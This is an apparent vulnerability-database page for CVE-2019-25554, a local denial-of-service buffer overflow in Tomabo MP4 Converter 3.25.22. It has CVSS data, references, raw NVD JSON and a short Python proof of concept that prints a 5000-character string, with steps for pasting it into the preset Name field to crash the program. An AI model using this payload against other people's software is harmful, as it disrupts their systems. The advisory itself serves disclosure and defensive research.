CVE-2019-25554

Description

Tomabo MP4 Converter 3.25.22 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string in the Name field. Attackers can trigger a buffer overflow by pasting a large payload into the Name parameter when adding a preset in the Video/Audio Formats options, causing the application to crash when Reset All is clicked.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:tomabo:mp4_converter:3.25.22:*:*:*:*:*:*:* - VULNERABLE

Tomabo MP4 Converter 3.25.22

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept for CVE-2019-25554
# This script generates a payload to trigger the DoS in Tomabo MP4 Converter 3.25.22

def generate_payload(length=5000):
    # Creating a long string of 'A' characters to overflow the buffer
    return "A" * length

if __name__ == "__main__":
    print("Generating payload for CVE-2019-25554...")
    payload = generate_payload(5000)
    
    print("Payload generated. Copy the string below and paste it into the 'Name' field.")
    print("Then, navigate to the Video/Audio Formats options, add a preset, paste the payload, and click 'Reset All'.")
    print("-" * 50)
    print(payload)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25554
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25554
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25554/
[4] VulDB https://vuldb.com/cve/CVE-2019-25554
[5] http://www.tomabo.com/
[6] https://www.exploit-db.com/exploits/46848
[7] https://www.vulncheck.com/advisories/tomabo-mp4-converter-denial-of-service-via-name-field

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25554", "sourceIdentifier": "[email protected]", "published": "2026-03-21T13:16:17.857", "lastModified": "2026-04-16T17:54:13.030", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tomabo MP4 Converter 3.25.22 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string in the Name field. Attackers can trigger a buffer overflow by pasting a large payload into the Name parameter when adding a preset in the Video/Audio Formats options, causing the application to crash when Reset All is clicked."}, {"lang": "es", "value": "Tomabo MP4 Converter 3.25.22 contiene una vulnerabilidad de denegación de servicio que permite a atacantes locales bloquear la aplicación al proporcionar una cadena excesivamente larga en el campo Nombre. Los atacantes pueden desencadenar un desbordamiento de búfer al pegar una carga útil grande en el parámetro Nombre al añadir un preajuste en las opciones de Formatos de Video/Audio, lo que provoca que la aplicación falle cuando se hace clic en Restablecer todo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tomabo:mp4_converter:3.25.22:*:*:*:*:*:*:*", "matchCriteriaId": "2113DD5D-E014-4834-8483-962C37A45CA0"}]}]}], "references": [{"url": "http://www.tomabo.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46848", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/tomabo-mp4-converter-denial-of-service-via-name-field", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}